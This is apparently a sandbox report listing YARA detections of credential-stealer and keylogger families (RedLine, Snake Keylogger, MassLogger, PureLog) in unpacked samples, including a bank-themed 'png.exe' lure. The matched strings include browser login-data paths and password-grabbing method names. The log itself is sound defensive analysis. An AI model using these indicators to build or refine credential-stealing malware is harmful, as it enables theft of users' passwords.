8.2.Ziraat_Bankasi_Swift_Messaji.png.exe.2864740.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.Native_snake01.exe.49d0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.49d0000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.49d0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.49d0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
10.2.Native_snake01.exe.49d0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.49d0000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
16.2.Native_New-Nova.exe.2142746.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.2142746.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.2142746.1.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.2142746.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.2142746.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.2142746.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.2142746.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ed60:$a1: get_encryptedPassword 0x1ed34:$a2: get_encryptedUsername 0x1edf8:$a3: get_timePasswordChanged 0x1ed10:$a4: get_passwordField 0x1ed76:$a5: set_encryptedPassword 0x1eb43:$a7: get_logins 0x1e0cd:$a8: GetOutlookPasswords 0x1d5f6:$a9: StartKeylogger 0x1bf58:$a10: KeyLoggerEventArgs 0x1bf27:$a11: KeyLoggerEventArgsEventHandler 0x1ec17:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.4a80000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2360f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x22b0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x22e1b:$a4: \Orbitum\User Data\Default\Login Data 0x23c13:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.22a2746.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.22a2746.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
16.2.Native_New-Nova.exe.214183e.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.214183e.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.214183e.2.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.214183e.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.214183e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.Native_New-Nova.exe.214183e.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf60:$a1: get_encryptedPassword 0x1cf34:$a2: get_encryptedUsername 0x1cff8:$a3: get_timePasswordChanged 0x1cf10:$a4: get_passwordField 0x1cf76:$a5: set_encryptedPassword 0x1cd43:$a7: get_logins 0x1c2cd:$a8: GetOutlookPasswords 0x1b7f6:$a9: StartKeylogger 0x1a158:$a10: KeyLoggerEventArgs 0x1a127:$a11: KeyLoggerEventArgsEventHandler 0x1ce17:$a13: _encryptedPassword
16.2.Native_New-Nova.exe.214183e.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2180f:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x20d0d:$a3: \Google\Chrome\User Data\Default\Login Data 0x2101b:$a4: \Orbitum\User Data\Default\Login Data 0x21e13:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.2221216.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.2221216.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.2221216.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.2221216.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
17.2.Native_snake01.exe.2221216.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.3600190.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.3600190.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.2221216.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
9.2.Native_New-Nova.exe.3600190.7.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.3600190.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.3600190.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.3600190.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.3600190.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
10.2.Native_snake01.exe.4930f20.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.4930f20.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.Native_snake01.exe.4930f20.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.4930f20.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1de58:$a1: get_encryptedPassword 0x1de2c:$a2: get_encryptedUsername 0x1def0:$a3: get_timePasswordChanged 0x1de08:$a4: get_passwordField 0x1de6e:$a5: set_encryptedPassword 0x1dc3b:$a7: get_logins 0x1d1c5:$a8: GetOutlookPasswords 0x1c6ee:$a9: StartKeylogger 0x1b050:$a10: KeyLoggerEventArgs 0x1b01f:$a11: KeyLoggerEventArgsEventHandler 0x1dd0f:$a13: _encryptedPassword
9.2.Native_New-Nova.exe.4b10000.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x22707:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x21c05:$a3: \Google\Chrome\User Data\Default\Login Data 0x21f13:$a4: \Orbitum\User Data\Default\Login Data 0x22d0b:$a5: \Kometa\User Data\Default\Login Data
17.3.Native_snake01.exe.680768.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.3.Native_snake01.exe.680768.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.3.Native_snake01.exe.680768.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.4a10000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.4a10000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.4a10000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.4a10000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33d9e:$a1: get_encryptedPassword 0x33d72:$a2: get_encryptedUsername 0x33e36:$a3: get_timePasswordChanged 0x33d4e:$a4: get_passwordField 0x33db4:$a5: set_encryptedPassword 0x33b81:$a7: get_logins 0x2f3e8:$a10: KeyLoggerEventArgs 0x2f3b7:$a11: KeyLoggerEventArgsEventHandler 0x33c55:$a13: _encryptedPassword
17.2.Native_snake01.exe.4a10000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3dff3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3d696:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d8f3:$a4: \Orbitum\User Data\Default\Login Data 0x3e2d2:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.4a10000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31968:$s1: UnHook 0x31904:$s2: SetHook 0x3193d:$s3: CallNextHook 0x318cc:$s4: _hook
15.2.BZTCUCKTKd.exe.16a46b8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
17.2.Native_snake01.exe.4a10000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.4a10000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.4a10000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.4a10000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
17.2.Native_snake01.exe.4a10000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.4a10000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.22a2746.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.Native_New-Nova.exe.35d5570.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cf60:$a1: get_encryptedPassword 0x1cf34:$a2: get_encryptedUsername 0x1cff8:$a3: get_timePasswordChanged 0x1cf10:$a4: get_passwordField 0x1cf76:$a5: set_encryptedPassword 0x1cd43:$a7: get_logins 0x1c2cd:$a8: GetOutlookPasswords 0x1b7f6:$a9: StartKeylogger 0x1a158:$a10: KeyLoggerEventArgs 0x1a127:$a11: KeyLoggerEventArgsEventHandler 0x1ce17:$a13: _encryptedPassword
17.2.Native_snake01.exe.49c0f20.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.49c0f20.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.49c0f20.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
17.2.Native_snake01.exe.49c0f20.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3599e:$a1: get_encryptedPassword 0x35972:$a2: get_encryptedUsername 0x35a36:$a3: get_timePasswordChanged 0x3594e:$a4: get_passwordField 0x359b4:$a5: set_encryptedPassword 0x35781:$a7: get_logins 0x30fe8:$a10: KeyLoggerEventArgs 0x30fb7:$a11: KeyLoggerEventArgsEventHandler 0x35855:$a13: _encryptedPassword
17.2.Native_snake01.exe.49c0f20.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
17.2.Native_snake01.exe.49c0f20.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33568:$s1: UnHook 0x33504:$s2: SetHook 0x3353d:$s3: CallNextHook 0x334cc:$s4: _hook
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.Native_New-Nova.exe.3425570.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.3.Native_New-Nova.exe.59f268.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
16.3.Native_New-Nova.exe.59f268.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.3.Native_New-Nova.exe.59f268.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
16.3.Native_New-Nova.exe.59f268.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.3.Native_New-Nova.exe.59f268.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.3.Native_New-Nova.exe.59f268.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
16.3.Native_New-Nova.exe.59f268.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x20907:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1fe05:$a3: \Google\Chrome\User Data\Default\Login Data 0x20113:$a4: \Orbitum\User Data\Default\Login Data 0x20f0b:$a5: \Kometa\User Data\Default\Login Data
9.2.Native_New-Nova.exe.4b10000.8.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.Native_New-Nova.exe.4b10000.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.Native_snake01.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.Native_New-Nova.exe.4b10000.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c058:$a1: get_encryptedPassword 0x1c02c:$a2: get_encryptedUsername 0x1c0f0:$a3: get_timePasswordChanged 0x1c008:$a4: get_passwordField 0x1c06e:$a5: set_encryptedPassword 0x1be3b:$a7: get_logins 0x1b3c5:$a8: GetOutlookPasswords 0x1a8ee:$a9: StartKeylogger 0x19250:$a10: KeyLoggerEventArgs 0x1921f:$a11: KeyLoggerEventArgsEventHandler 0x1bf0f:$a13: _encryptedPassword
17.2.Native_snake01.exe.2221216.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.Native_snake01.exe.2221216.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
17.2.Native_snake01.exe.2221216.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.Native_snake01.exe.4930000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Native_snake01.exe.4930f20.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
